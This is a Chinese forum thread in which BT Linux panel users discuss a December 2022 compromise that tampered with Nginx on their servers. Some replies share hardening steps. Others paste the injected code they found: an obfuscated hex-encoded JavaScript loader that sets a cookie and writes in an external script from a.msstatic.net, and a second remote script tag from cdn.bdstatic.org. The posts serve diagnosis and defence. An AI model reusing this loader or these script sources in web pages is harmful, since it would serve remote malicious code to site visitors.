当前位置:论坛首页 > Linux面板 > 建议

【官方公告】关于外传宝塔面板或Nginx异常的公告

发表在 Linux面板2022-12-9 10:18   [复制链接] 159 94152

发表于 2022-12-9 12:33:54 | 显示全部楼层
11111111111111.png 宝塔小心
使用道具 举报 回复 支持 反对
发表于 2022-12-9 12:45:51 | 显示全部楼层
<script>var _0xd4d9=["\x67\x65\x74\x4D\x69\x6E\x75\x74\x65\x73","\x73\x65\x74\x4D\x69\x6E\x75\x74\x65\x73","\x63\x6F\x6F\x6B\x69\x65","\x3D","\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x77\x61\x66\x5F\x73\x63","\x35\x38\x38\x39\x36\x34\x37\x37\x32\x36","\x25\x33\x43\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x73\x3A\x2F\x2F\x61\x2E\x6D\x73\x73\x74\x61\x74\x69\x63\x2E\x6E\x65\x74\x2F\x6D\x61\x69\x6E\x33\x2F\x63\x6F\x6D\x6D\x6F\x6E\x2F\x61\x73\x73\x65\x74\x73\x2F\x74\x65\x6D\x70\x6C\x61\x74\x65\x2F\x68\x65\x61\x64\x2F\x61\x64\x2E\x74\x6D\x70\x6C\x5F\x61\x39\x62\x37\x2E\x6A\x73\x27\x25\x33\x45\x25\x33\x43\x2F\x73\x63\x72\x69\x70\x74\x25\x33\x45","\x77\x72\x69\x74\x65"];function setc(_0x64d8x2,_0x64d8x3,_0x64d8x4){var _0x64d8x5= new Date();_0x64d8x5[_0xd4d9[1]](_0x64d8x5[_0xd4d9[0]]()+ _0x64d8x4);document[_0xd4d9[2]]= _0x64d8x2+ _0xd4d9[3]+ _0x64d8x3+ _0xd4d9[4]+ _0x64d8x5[_0xd4d9[5]]()}setc(_0xd4d9[6],_0xd4d9[7],360);document[_0xd4d9[9]](unescape(_0xd4d9[8]));</script>
<script src="https://a.msstatic.net/main3/common/assets/template/head/ad.tmpl_a9b7.js"></script>

一样。下面那个js是不是出现再body标签后面?  发表于 2022-12-9 12:48
使用道具 举报 回复 支持 反对
发表于 2022-12-9 12:48:38 | 显示全部楼层
宝塔用户_swptaa 发表于 2022-12-9 11:05
宝塔漏洞都传疯了,官方要赶紧给出解决方案。个人测试后的效果是:

每台服务器都开启BasicAuth认证,部分 ...

下载到本地 杀毒 貌似也没检测出来<script src="https://a.msstatic.net/main3/common/assets/template/head/ad.tmpl_a9b7.js"></script>
使用道具 举报 回复 支持 反对
发表于 2022-12-9 12:52:19 | 显示全部楼层
<script src="//cdn.bdstatic.org/scripts/common.js"></script>
使用道具 举报 回复 支持 反对
发表于 2022-12-9 12:53:28 | 显示全部楼层
宝塔用户_twwase 发表于 2022-12-9 12:45
var _0xd4d9=["\x67\x65\x74\x4D\x69\x6E\x75\x74\x65\x73","\x73\x65\x74\x4D\x69\x6E\x75\x74\x65\x73"," ...

哎 在head里 包了
使用道具 举报 回复 支持 反对
发表于 2022-12-9 13:00:12 | 显示全部楼层
这个算是提权成功了。
首先可以肯定的就是用户的网站代码肯定存在漏洞。
  其次就是能替换宝塔nginx文件,这个算是系统层的利用了。
使用道具 举报 回复 支持 反对
发表于 2022-12-9 14:11:04 | 显示全部楼层
本帖最后由 老衲依旧爱飘柔 于 2022-12-9 14:12 编辑

(端口、ssh端口、宝塔端口)指定ip
启用防串改,权限644。
再牛掰都进不来

再给服务器套上密钥,这都能入侵
这大佬干点啥不好?
使用道具 举报 回复 支持 反对
发表于 2022-12-9 14:25:33 | 显示全部楼层
/www/server/nginx/sbin  这个文件夹给什么权限最好
使用道具 举报 回复 支持 反对
发表于 2022-12-9 14:34:46 | 显示全部楼层
老衲依旧爱飘柔 发表于 2022-12-9 14:11
(端口、ssh端口、宝塔端口)指定ip
启用防串改,权限644。
再牛掰都进不来

我从不开放ssh端口的,自己都不记得root密码,再加上BasicAuth认证,黑客应该进不来了吧
使用道具 举报 回复 支持 反对
发表于 2022-12-9 14:54:08 | 显示全部楼层
16848 发表于 2022-12-9 14:25
/www/server/nginx/sbin  这个文件夹给什么权限最好
  1. chattr -RV +i /www/server/nginx/sbin/
复制代码
禁止修改就好了吧,不过升级Nginx的时候记得去掉
使用道具 举报 回复 支持 反对
发表于 2022-12-9 15:05:00 | 显示全部楼层
最*我两台服务器都沦陷了,一个网站中招了,整个服务器都沦陷了。整天都提天吊胆的,都是改的 nginx 的配置文件,而且明明都加 chattr -i 的,还是能被篡改。/www/server/panel/vhost/nginx  现在开启的防篡改,维护起来极不方便。
使用道具 举报 回复 支持 反对
发表于 2022-12-9 15:38:33 | 显示全部楼层
pcik 发表于 2022-12-9 15:05
最*我两台服务器都沦陷了,一个网站中招了,整个服务器都沦陷了。整天都提天吊胆的,都是改的 nginx 的配置 ...

端口必须改了,还有二次认证,我用的是ng1.18和1.21版本没用1.22
使用道具 举报 回复 支持 反对
发表于 2022-12-9 15:42:50 | 显示全部楼层
2022-12-09_154113.png
这样设置管用吗 问题是644权限是不是影响网站运行
使用道具 举报 回复 支持 反对
发表于 2022-12-9 16:02:42 | 显示全部楼层

页面空白,刷新后就这样
使用道具 举报 回复 支持 反对
发表于 2022-12-9 16:31:15 | 显示全部楼层
宝塔用户_twwase 发表于 2022-12-9 12:48
下载到本地 杀毒 貌似也没检测出来

是的,看了大佬发的内容,就算是数据下载到本地,也不能解决 异常跳转的问题。还是得 全格,重装

根本就不是网站源代码被改了,就是服务器系统被篡改了  发表于 2023-1-6 15:16
使用道具 举报 回复 支持 反对
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

普通问题处理

论坛响应时间:72小时

问题处理方式:排队(仅解答)

工作时间:白班:9:00 - 18:00

紧急运维服务

响应时间:3分钟

问题处理方式:宝塔专家1对1服务

工作时间:工作日:9:00 - 18:30

宝塔专业团队为您解决服务器疑难问题

立即付费处理

工作时间:09:00至24:00

快速回复 返回顶部 返回列表